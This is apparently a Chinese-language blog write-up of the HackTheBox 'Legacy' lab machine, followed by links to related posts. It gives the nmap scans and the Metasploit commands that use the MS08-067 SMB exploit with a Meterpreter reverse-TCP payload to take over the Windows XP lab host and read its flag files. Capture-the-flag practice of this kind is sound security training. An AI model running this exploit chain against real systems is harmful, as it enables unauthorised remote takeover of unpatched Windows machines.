HackTheBox-Machines--Legacy

七天啊2024-04-01 20:34

文章目录

  • [1 端口扫描](#1 端口扫描)
  • [2 测试思路](#2 测试思路)
  • [3 445端口漏洞测试](#3 445端口漏洞测试)
  • [4 flag](#4 flag)

Legacy 测试过程

1 端口扫描

bash 复制代码 
nmap -sC -sV 10.129.227.181

2 测试思路

**  目标开启了135、139、445端口,445 SMB服务存在很多可利用漏洞,所以测试点先从445端口开始。而且在Nmap扫描结果中,可以看到系统是Windows XP,所以寻找Windows XP相关的SMB漏洞。**

3 445端口漏洞测试

**  1.搜索SMB服务相关漏洞**

bash 复制代码 
nmap -p 445 --srcipt vuln 10.129.227.181

**  2.漏洞exploit**

bash 复制代码 
search exploit/windows/smb

在输出中存在很多可利用exploit

bash 复制代码 
 use exploit/windows/smb/ms08_067_netapi 
 set payload windows/meterpreter/reverse_tcp
 set rhosts 10.129.227.181
 set rport 445
 run

4 flag

bash 复制代码 
type C:\Documents and Settings\john\Desktop\user.txt
type  C:\Documents and Settings\Administrator\Desktop\root.txt
相关推荐
马·坚18 天前
渗透测试基础(四) MS08-067 漏洞攻击
网络·网络安全·渗透测试·ms08-067
0415i25 天前
Hack The Box-Blurry
pickle·提权·rce·hack the box·clearml·cve-2024-24590
七天啊1 个月前
HackTheBox-Machines--Cronos
sql注入·命令执行·hack the box·计划任务写入shell提权
七天啊8 个月前
HackTheBox-Starting Point--Tier 2---Markup
xxe·hack the box·ssh私钥登录·windows权限问题·计划任务反弹shell
七天啊8 个月前
HackTheBox-Starting Point--Tier 2---Unified
mongodb·hack the box·jndi注入·cve-2021-44228
七天啊8 个月前
HackTheBox-Starting Point--Tier 2---Base
文件上传漏洞·反弹shell·hack the box·find命令
七天啊8 个月前
HackTheBox-Starting Point--Tier 1---Funnel
postgresql·hack the box·ssh隧道
7ig3r1 年前
【Kali】vmware虚拟机三种网络连接方式,ms17-010 , ms08_067的复现
linux·kali·ms17-010·ms08-067
热门推荐
012024年江苏省研究生数学建模科研创新实践大赛C题气象数据高精度融合技术研究论文和代码分析02Coze扣子平台完整体验和实践(附国内和国际版对比)03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)042024亚太赛(中文赛)数学建模竞赛选题建议+初步分析05yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)06【经验分享】Ubuntu22.04安装微信(linux官方版)072024 年第十四届 APMCM 亚太地区大学生数学建模竞赛B题超详细解题思路+数据预处理问题一代码分享082025张宇考研数学,百度网盘视频课+36讲PDF讲义+真题09【立创EDA-PCB设计基础】6.布线铺铜实战及细节详解10通用大模型VS垂直大模型,你更青睐哪一方?